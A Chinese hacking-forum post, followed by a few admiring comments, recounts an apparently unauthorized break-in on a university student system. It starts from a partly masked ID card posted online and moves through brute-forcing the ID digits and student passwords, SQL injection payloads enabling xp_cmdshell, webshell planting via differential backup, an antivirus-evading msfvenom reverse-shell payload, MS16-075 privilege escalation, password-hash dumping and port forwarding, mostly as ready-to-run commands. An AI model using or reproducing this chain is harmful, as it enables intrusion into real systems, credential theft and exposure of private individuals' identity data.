用户
搜索
  • TA的每日心情
    开心
    2018-12-11 19:06
  • 签到天数: 9 天

    连续签到: 1 天

    [LV.3]经常看看I

    i春秋-见习白帽

    Rank: 3Rank: 3

    9

    主题

    36

    帖子

    199

    魔法币
    收听
    1
    粉丝
    1
    注册时间
    2016-6-22
    发表于 2019-9-9 18:07:35 32836
    一、前言
    最近随便逛贴吧看到这样一篇帖子,有人捡到一张身份证,挂到了贴吧上让失主来认领,由于身份证的号码未完全打码,导致的一次渗透测试
    1.png

    二、信息收集
    通过前期的信息收集,我获得了两个有价值的url地址,一个是学生登录处(没有学生证号码)
    2.png
    一个是输入身份证就可以查询学号,寝室号的地址
    3.png
    由于隐私问题,我随便列举一个身份证号码:31190******6302333,星号的地方就是第一张图用手挡住的地方。根据这点信息可以获取完整的身份证号码。
    1.先查看这个地方的身份证前6位是多少开头,获取到第一个星号的数字为3
    2.后面的星号就是这个人的出身年份,由于是在校大学生,年份应该在1996-2000   
    3.最后一个星号,为出生的月份,月份为1-12,爆破下
    4.png

    获取到完整的身份证信息,可以根据这个身份证信息进行查询到学号
    5.png


    三、发现SQL注入
    获取到学号,可以猜解学生密码(一般学校给学生账号的初始密码为8888,123456,123,身份证后6位等等),由于这个人的密码改了,可以根据利用学生号爆破其他人的账号密码,获取到2个账号密码

    6.png
    登进学生系统,发现sql注入
    7.png

    根据报错的sql语句,payload为:txtEnd=2019%2F9%2F9' as datetime);exec master..xp_cmdshell "whoami"--       没有开启xp_cmdshell组件
    8.png
    开启xp_cmdshell组件
    txtEnd=2019%2F9%2F9' as datetime);EXEC sp_configure 'show advanced options',1 RECONFIGURE EXEC sp_configure 'xp_cmdshell',1 RECONFIGURE;--
    执行whoami,出现了错误代码5,降低了cmd的权限

    9.png

    四、差异备份getshell
    我想应该是360之类的杀毒软件阻止了xp_cmdshell,这里可以利用差异备份进行getshell(需要绝对路径)
    创建数据库:create database dbs;
    第一次备份:backup database dbs to disk = 'D:\www\abc.bak';
    创建表:use dbs;create table fx(cmd image);
    表中插入数据:insert into fx(cmd) values(aspx一句话的16进制);
    进行差异备份:backup database dbs to disk = '网站绝对路径' WITH DIFFERENTIAL,FORMAT;
    访问地址,成功getshell
    10.png

    需要登录的状态才能访问到shell,可以利用中国蚁剑添加cookie来getshell
    11.png

    五、提权
    执行tasklist,发现360杀毒软件,这个360有点垃圾,应该不是最新版,msf多编码几次就过了这个360
    msfVENOM -a x64 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xxx.xxx.xxx LPORT=6666 -e x64/shikata_ga_nai -i 20 -f exe > backdoor.5.1.10.exe
    metasploit执行如下:
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost xx.xx.xx.xx
    set lport 6666
    exploit
    12.png
    查看补丁情况:systeminfo,发现ms16-075没有打补丁,利用metasploit提权
    use exploit/windows/local/ms16_075_reflection_juicy
    set payload windows/meterpreter/reverse_tcp
    set session 1
    set lhost xx.xx.xx.xx
    set lport 6666
    exploit
    13.png

    读取密码hash:run post/windows/gather/hashdump
    14.png

    读出来的hash可以到cmd5上解密出来,省得用mimikatz+procdump64得方式去读取密码明文了
    最后端口转发登录服务器:portfwd add -l 3389 -p 3389 -r xx.xx.xx.xx(服务器内网地址)
    G[{(O5NP)~0VZ_IL5`JUFUM.png

    五、后记




    在写这个文章得时候,漏洞已经修复了,有2张图片用的以前得图片。文章没啥技术含量,希望大佬看了不要喷我。这是我发布得第二篇文章,如果你们觉得我写的好我会持续更新得,感谢个位。




    发表于 2019-9-9 20:39:36
    赞你这个思路,通过一个打码图片引发的渗透
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    发表于 2019-9-9 23:36:10
    家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮家哥牛皮
    使用道具 举报 回复
    发表于 2019-9-10 21:40:12
    很强势的,老哥
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册